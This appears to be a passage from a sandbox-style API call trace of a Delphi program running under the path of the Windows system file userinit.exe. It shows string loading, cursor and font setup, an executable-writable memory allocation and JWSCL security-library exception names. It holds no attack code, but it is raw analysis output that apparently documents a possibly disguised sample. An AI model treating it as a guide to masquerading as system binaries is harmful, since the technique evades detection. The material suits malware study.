[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff03, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff02, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff01, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff00, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff1f, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff1e, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff1d, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff1c, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff1b, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0100.120] LoadStringA (in: hInstance=0x28d0000, uID=0xff1a, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff19, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff18, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff17, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff16, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff15, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff14, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff13, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff12, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff11, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff10, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff2f, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0100.121] LoadStringA (in: hInstance=0x28d0000, uID=0xff2e, lpBuffer=0xef0f8, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0100.121] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0100.121] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0100.121] GetVersion () returned 0x1db10106
[0100.121] GetCurrentProcessId () returned 0xf7c
[0100.121] GlobalAddAtomA (lpString="Delphi00000F7C") returned 0xc150
[0100.121] GetCurrentThreadId () returned 0xf80
[0100.121] GlobalAddAtomA (lpString="ControlOfs028D000000000F80") returned 0xc149
[0100.121] RegisterClipboardFormatA (lpszFormat="ControlOfs028D000000000F80") returned 0xc165
[0100.121] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0100.121] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0100.122] GetSystemMetrics (nIndex=19) returned 1
[0100.122] GetSystemMetrics (nIndex=75) returned 1
[0100.122] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x29f1320, fWinIni=0x0 | out: pvParam=0x29f1320) returned 1
[0100.122] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0100.122] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0100.122] LoadCursorA (hInstance=0x28d0000, lpCursorName=0x7ff9) returned 0x201d3
[0100.122] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0100.122] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0100.122] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0100.122] LoadCursorA (hInstance=0x28d0000, lpCursorName=0x7ffa) returned 0x201d7
[0100.122] LoadCursorA (hInstance=0x28d0000, lpCursorName=0x7ffb) returned 0x201d9
[0100.122] LoadCursorA (hInstance=0x28d0000, lpCursorName=0x7ffc) returned 0x20215
[0100.123] LoadCursorA (hInstance=0x28d0000, lpCursorName=0x7ffd) returned 0x20217
[0100.123] LoadCursorA (hInstance=0x28d0000, lpCursorName=0x7fff) returned 0x20219
[0100.123] LoadCursorA (hInstance=0x28d0000, lpCursorName=0x7ffe) returned 0x2021b
[0100.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0100.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0100.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0100.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0100.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0100.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0100.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0100.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0100.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0100.123] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0100.123] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0100.124] GetDC (hWnd=0x0) returned 0xe010895
[0100.124] GetDeviceCaps (hdc=0xe010895, index=90) returned 96
[0100.124] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.124] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0100.124] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2929a60, dwData=0x29f156c) returned 1
[0100.124] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0xef463, fWinIni=0x0 | out: pvParam=0xef463) returned 1
[0100.124] CreateFontIndirectA (lplf=0xef463) returned 0xd0a0854
[0100.124] GetObjectA (in: h=0xd0a0854, c=60, pv=0xef254 | out: pv=0xef254) returned 60
[0100.124] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0xef30f, fWinIni=0x0 | out: pvParam=0xef30f) returned 1
[0100.124] CreateFontIndirectA (lplf=0xef3eb) returned 0x100a0858
[0100.124] GetObjectA (in: h=0x100a0858, c=60, pv=0xef254 | out: pv=0xef254) returned 60
[0100.124] CreateFontIndirectA (lplf=0xef3af) returned 0xf0a0857
[0100.124] GetObjectA (in: h=0xf0a0857, c=60, pv=0xef254 | out: pv=0xef254) returned 60
[0100.125] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0100.125] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xef3c3, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0100.125] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0xef3c3 | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0100.125] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x230000
[0100.125] GetKeyboardLayoutList (in: nBuff=64, lpList=0xef344 | out: lpList=0xef344) returned 1
[0100.126] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0100.126] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0100.127] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0100.127] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0100.127] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0100.127] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0100.127] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0100.127] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0100.127] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0100.127] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0100.127] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0100.128] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0100.128] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0100.128] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0100.128] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0100.128] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0100.128] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0100.128] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0100.128] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0100.128] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0100.128] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0100.128] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0100.128] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0100.128] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0100.129] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0100.129] LoadStringA (in: hInstance=0x28d0000, uID=0xff59, lpBuffer=0xef0a4, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0100.129] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0100.129] LoadStringA (in: hInstance=0x28d0000, uID=0xff5a, lpBuffer=0xef0a4, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0100.129] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0100.129] LoadStringA (in: hInstance=0x28d0000, uID=0xff5b, lpBuffer=0xef0a4, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0100.129] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0100.129] LoadStringA (in: hInstance=0x28d0000, uID=0xff5c, lpBuffer=0xef0a4, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0100.129] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0100.129] SetErrorMode (uMode=0x8000) returned 0x1
[0100.129] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6ce90000
[0100.131] SetErrorMode (uMode=0x1) returned 0x8000
[0100.131] GetProcAddress (hModule=0x6ce90000, lpProcName="OleCreatePropertyFrame") returned 0x6ce920ea
[0100.132] GetProcAddress (hModule=0x6ce90000, lpProcName="OleCreateFontIndirect") returned 0x6ce920b7
[0100.132] GetProcAddress (hModule=0x6ce90000, lpProcName="OleCreatePictureIndirect") returned 0x6ce920c8
[0100.132] GetProcAddress (hModule=0x6ce90000, lpProcName="OleLoadPicture") returned 0x6ce920d9
[0100.132] SysReAllocStringLen (in: pbstr=0x29bfa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x29bfa98*="EJwsclUnsupportedException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bfa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x29bfa80*="EJwsclPIDException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bfa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x29bfa68*="EJwsclJwShellExecuteException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bfa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x29bfa50*="EJwsclShellExecuteException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bfa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x29bfa38*="EJwsclElevationException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bfa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x29bfa20*="EJwsclAbortException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bfa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x29bfa08*="EJwsclSuRunErrorException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bf9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x29bf9f0*="EJwsclElevateProcessException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bf9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x29bf9d8*="EJwsclCertApiException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bf9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x29bf9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bf9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x29bf9a8*="EJwsclInvalidStartupInfo") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bf990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x29bf990*="EJwsclFirewallNoExceptionsException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bf978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x29bf978*="EJwsclFirewallInactiveException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bf960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x29bf960*="EJwsclFirewallDelRuleException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bf948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x29bf948*="EJwsclAddUdpPortToFirewallException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bf930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x29bf930*="EJwsclAddTcpPortToFirewallException") returned 1
[0100.132] SysReAllocStringLen (in: pbstr=0x29bf918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x29bf918*="EJwsclFirewallAddRuleException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x29bf900*="EJwsclSetRemoteAdminAdressException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x29bf8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x29bf8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x29bf8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x29bf8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x29bf888*="EJwsclGetIncomingPingAllowedException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x29bf870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x29bf858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x29bf840*="EJwsclGetFWStateException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x29bf828*="EJwsclSetFWStateException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x29bf810*="EJwsclFirewallProfileInitException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x29bf7f8*="EJwsclFirewallInitException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x29bf7e0*="EJwsclGenericFirewallException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x29bf7c8*="EJwsclEnumerateProcessFailed") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x29bf7b0*="EJwsclInvalidRegistryPath") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x29bf798*="EJwsclEndOfStream") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x29bf780*="EJwsclClassTypeMismatch") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x29bf768*="EJwsclInvalidHandle") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x29bf750*="EJwsclInvalidIndex") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x29bf738*="EJwsclInvalidSession") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x29bf720*="EJwsclMissingEvent") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x29bf708*="EJwsclInvalidPointerType") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x29bf6f0*="EJwsclCreateProcessFailed") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x29bf6d8*="EJwsclNilPointer") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x29bf6c0*="EJwsclUnimplemented") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x29bf6a8*="EJwsclInitWellKnownException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x29bf690*="EJwsclKeyApiException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x29bf678*="EJwsclKeyException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x29bf660*="EJwsclHashApiException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x29bf648*="EJwsclHashException") returned 1
[0100.133] SysReAllocStringLen (in: pbstr=0x29bf630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x29bf630*="EJwsclCSPApiException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x29bf618*="EJwsclCSPException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x29bf600*="EJwsclTerminalSessionException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x29bf5e8*="EJwsclTerminalServiceNecessary") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x29bf5d0*="EJwsclTerminalServiceException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x29bf5b8*="EJwsclTerminalServerConnectException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x29bf5a0*="EJwsclTerminalServerException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x29bf588*="EJwsclCryptUnsupportedException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x29bf570*="EJwsclCryptApiException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x29bf558*="EJwsclCryptException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x29bf540*="EJwsclOSError") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x29bf528*="EJwsclResourceInitFailed") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x29bf510*="EJwsclResourceUnequalCount") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x29bf4f8*="EJwsclResourceNotFound") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x29bf4e0*="EJwsclResourceException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x29bf4c8*="EJwsclFailedAddACE") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x29bf4b0*="EJwsclUnsupportedACE") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x29bf498*="EJwsclOpenWindowStationException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x29bf480*="EJwsclWindowStationException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x29bf468*="EJwsclCloseDesktopException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x29bf450*="EJwsclCreateDesktopException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x29bf438*="EJwsclOpenDesktopException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x29bf420*="EJwsclDesktopException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x29bf408*="EJwsclSACLAccessDenied") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x29bf3f0*="EJwsclAccessDenied") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x29bf3d8*="EJwsclLSAException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x29bf3c0*="ESetOwnerException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x29bf3a8*="ESetSecurityException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x29bf390*="EJwsclInvalidParentDescriptor") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x29bf378*="EJwsclInvalidKeyPath") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x29bf360*="EJwsclInvalidGenericAccessMask") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x29bf348*="EJwsclAdaptSecurityInfoException") returned 1
[0100.134] SysReAllocStringLen (in: pbstr=0x29bf330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x29bf330*="EJwsclThreadException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x29bf318*="EJwsclInvalidObjectException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x29bf300*="EJwsclSecurityObjectException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x29bf2e8*="EJwsclHashMismatch") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x29bf2d0*="EJwsclStreamHashException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x29bf2b8*="EJwsclStreamInvalidMagicException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x29bf2a0*="EJwsclStreamSizeException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x29bf288*="EJwsclStreamException") returned 1
[0100.135] SysReAllocStringLen (in: pbstr=0x29bf270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x29bf270*="EJwsclNoSuchLogonSession") returned 1
